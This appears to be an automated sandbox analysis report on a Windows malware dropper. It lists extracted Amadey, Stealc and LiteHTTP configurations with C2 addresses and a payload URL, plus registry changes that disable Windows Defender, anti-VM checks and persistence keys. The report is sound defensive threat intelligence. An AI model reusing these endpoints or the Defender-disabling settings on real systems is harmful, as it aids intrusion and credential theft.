Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
05/03/2025, 19:40
Static task
static1
Behavioral task
behavioral1
Sample
44c657fa4e956fb944c42dc881d49a4a719767a2b92d02729e7415a6c6a14192.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
44c657fa4e956fb944c42dc881d49a4a719767a2b92d02729e7415a6c6a14192.exe
Resource
win10v2004-20250217-en
General
-
Target
44c657fa4e956fb944c42dc881d49a4a719767a2b92d02729e7415a6c6a14192.exe
-
Size
938KB
-
MD5
ab988dd02c8cea50ac224daf0e53f3e9
-
SHA1
050ebd6e5d25d9b84b722dcea79b2243890c1652
-
SHA256
44c657fa4e956fb944c42dc881d49a4a719767a2b92d02729e7415a6c6a14192
-
SHA512
c8c9044520c124e47ace7b53e1824c70b41792cb7cdde0ab272a936dce82fb567743f1b2a7fa506b6357005974b1f33f8fee3f595b5a366894971de0b6f9f1bd
-
SSDEEP
24576:lqDEvCTbMWu7rQYlBQcBiT6rprG8a0Qu:lTvC/MTQYxsWR7a0Q
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
stealc
trump
http://45.93.20.28
-
url_path
/85a1cacf11314eb8.php
Extracted
litehttp
v1.0.9
http://185.208.156.162/page.php
-
key
v1d6kd29g85cm8jp4pv8tvflvg303gbl
Signatures
-
Amadey family
-
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral2/memory/5680-1902-0x0000000000320000-0x000000000078A000-memory.dmp healer behavioral2/memory/5680-1904-0x0000000000320000-0x000000000078A000-memory.dmp healer behavioral2/memory/5680-3403-0x0000000000320000-0x000000000078A000-memory.dmp healer -
Gcleaner family
-
Healer family
-
Litehttp family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" de5df7d9f4.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" de5df7d9f4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" de5df7d9f4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" de5df7d9f4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" de5df7d9f4.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection de5df7d9f4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" de5df7d9f4.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" de5df7d9f4.exe -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications de5df7d9f4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" de5df7d9f4.exe -
Stealc family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
description pid Process procid_target PID 8 created 3316 8 AhFKwnS.exe 55 PID 4928 created 3316 4928 AhFKwnS.exe 55 -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 13 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Temp9MDGV1BO6ZISXHPSXUPOWGBIHDVAAVJZ.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 9f85653241.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ S3QJ9ZRVCQEWMP1J3S.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ v6Oqdnc.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 6988727892.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ b4727e7654.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 445719b67a.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 9133893bdd.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ de5df7d9f4.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 18 2208 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
pid Process 2208 powershell.exe 4740 powershell.exe 5248 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file 16 IoCs
flow pid Process 72 5032 rapes.exe 104 5032 rapes.exe 104 5032 rapes.exe 18 2208 powershell.exe 109 2300 9133893bdd.exe 59 5032 rapes.exe 78 5476 BitLockerToGo.exe 218 5032 rapes.exe 218 5032 rapes.exe 218 5032 rapes.exe 218 5032 rapes.exe 218 5032 rapes.exe 218 5032 rapes.exe 31 5032 rapes.exe 31 5032 rapes.exe 55 4924 BitLockerToGo.exe -
Stops running service(s) 4 TTPs
-
.NET Reactor proctector 2 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
resource yara_rule behavioral2/files/0x0007000000024267-5244.dat net_reactor behavioral2/memory/2816-5268-0x0000000000EA0000-0x0000000000F00000-memory.dmp net_reactor -
Checks BIOS information in registry 2 TTPs 26 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion v6Oqdnc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6988727892.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 9f85653241.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion S3QJ9ZRVCQEWMP1J3S.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Temp9MDGV1BO6ZISXHPSXUPOWGBIHDVAAVJZ.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion b4727e7654.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 9f85653241.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion v6Oqdnc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 9133893bdd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion b4727e7654.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 445719b67a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 445719b67a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 9133893bdd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion de5df7d9f4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Temp9MDGV1BO6ZISXHPSXUPOWGBIHDVAAVJZ.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6988727892.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion S3QJ9ZRVCQEWMP1J3S.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion de5df7d9f4.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation Temp9MDGV1BO6ZISXHPSXUPOWGBIHDVAAVJZ.EXE Key value queried \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation rapes.exe Key value queried \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation mshta.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeName.vbs AhFKwnS.exe -
Executes dropped EXE 30 IoCs
pid Process 536 Temp9MDGV1BO6ZISXHPSXUPOWGBIHDVAAVJZ.EXE 5032 rapes.exe 4684 6988727892.exe 2256 rapes.exe 32 20a66c7e87.exe 2152 20a66c7e87.exe 1464 b4727e7654.exe 8 AhFKwnS.exe 5792 445719b67a.exe 2300 9133893bdd.exe 5132 9f85653241.exe 5508 rapes.exe 456 3dafbcc94d.exe 1360 S3QJ9ZRVCQEWMP1J3S.exe 5680 de5df7d9f4.exe 4928 AhFKwnS.exe 1464 v6Oqdnc.exe 6240 OEHBOHk.exe 6640 MCxU5Fj.exe 6720 MCxU5Fj.exe 6744 MCxU5Fj.exe 1704 ckonftponqgz.exe 2388 Y87Oyyz.exe 3452 Y87Oyyz.exe 5632 SplashWin.exe 1372 SplashWin.exe 7092 ce4pMzk.exe 2816 mAtJWNv.exe 1092 mAtJWNv.exe 5884 rapes.exe -
Identifies Wine through registry keys 2 TTPs 13 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine S3QJ9ZRVCQEWMP1J3S.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine v6Oqdnc.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine 445719b67a.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine 9133893bdd.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine 9f85653241.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine de5df7d9f4.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine Temp9MDGV1BO6ZISXHPSXUPOWGBIHDVAAVJZ.EXE Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine 6988727892.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine b4727e7654.exe Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine rapes.exe -
Loads dropped DLL 7 IoCs
pid Process 3452 Y87Oyyz.exe 5632 SplashWin.exe 5632 SplashWin.exe 5632 SplashWin.exe 1372 SplashWin.exe 1372 SplashWin.exe 1372 SplashWin.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features de5df7d9f4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" de5df7d9f4.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 5 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\3dafbcc94d.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10106230101\\3dafbcc94d.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\de5df7d9f4.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10106240101\\de5df7d9f4.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Anubis = "\"C:\\Users\\Admin\\AppData\\Roaming\\Local\\Caches\\EbiNpu2Z\\Anubis.exe\"" ce4pMzk.exe Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\9133893bdd.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10106210101\\9133893bdd.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\9f85653241.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10106220101\\9f85653241.exe" rapes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 3024 powercfg.exe 6876 powercfg.exe 6860 powercfg.exe 6868 powercfg.exe 6848 powercfg.exe 4816 powercfg.exe 5672 powercfg.exe 5636 powercfg.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x000b000000023dcb-1588.dat autoit_exe -
Drops file in System32 directory 4 IoCs
description ioc Process File opened for modification C:\Windows\system32\MRT.exe OEHBOHk.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\MRT.exe ckonftponqgz.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 13 IoCs
pid Process 536 Temp9MDGV1BO6ZISXHPSXUPOWGBIHDVAAVJZ.EXE 5032 rapes.exe 4684 6988727892.exe 2256 rapes.exe 1464 b4727e7654.exe 5792 445719b67a.exe 2300 9133893bdd.exe 5132 9f85653241.exe 5508 rapes.exe 1360 S3QJ9ZRVCQEWMP1J3S.exe 5680 de5df7d9f4.exe 1464 v6Oqdnc.exe 5884 rapes.exe -
Suspicious use of SetThreadContext 10 IoCs
description pid Process procid_target PID 32 set thread context of 2152 32 20a66c7e87.exe 106 PID 4684 set thread context of 4924 4684 6988727892.exe 111 PID 8 set thread context of 5356 8 AhFKwnS.exe 119 PID 1464 set thread context of 5476 1464 b4727e7654.exe 118 PID 4928 set thread context of 5252 4928 AhFKwnS.exe 154 PID 6640 set thread context of 6744 6640 MCxU5Fj.exe 159 PID 1704 set thread context of 6408 1704 ckonftponqgz.exe 192 PID 1704 set thread context of 6976 1704 ckonftponqgz.exe 197 PID 1372 set thread context of 3172 1372 SplashWin.exe 203 PID 2816 set thread context of 1092 2816 mAtJWNv.exe 207 -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\rapes.job Temp9MDGV1BO6ZISXHPSXUPOWGBIHDVAAVJZ.EXE -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2264 sc.exe 2116 sc.exe 5600 sc.exe 3088 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
pid pid_target Process procid_target 4600 32 WerFault.exe 105 6836 6640 WerFault.exe 157 6052 2816 WerFault.exe 206 -
System Location Discovery: System Language Discovery 1 TTPs 40 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language b4727e7654.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AhFKwnS.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9f85653241.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Y87Oyyz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 20a66c7e87.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language InstallUtil.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 3dafbcc94d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language S3QJ9ZRVCQEWMP1J3S.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MCxU5Fj.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Y87Oyyz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SplashWin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9133893bdd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 3dafbcc94d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SplashWin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mAtJWNv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 6988727892.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language v6Oqdnc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mAtJWNv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 445719b67a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Temp9MDGV1BO6ZISXHPSXUPOWGBIHDVAAVJZ.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 20a66c7e87.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3dafbcc94d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language InstallUtil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AhFKwnS.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MCxU5Fj.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language de5df7d9f4.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 44c657fa4e956fb944c42dc881d49a4a719767a2b92d02729e7415a6c6a14192.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe -
Checks processor information in registry 2 TTPs 8 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe -
Kills process with taskkill 5 IoCs
pid Process 3256 taskkill.exe 6060 taskkill.exe 3564 taskkill.exe 5488 taskkill.exe 4908 taskkill.exe -
Modifies data under HKEY_USERS 46 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\Local Settings firefox.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5044 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
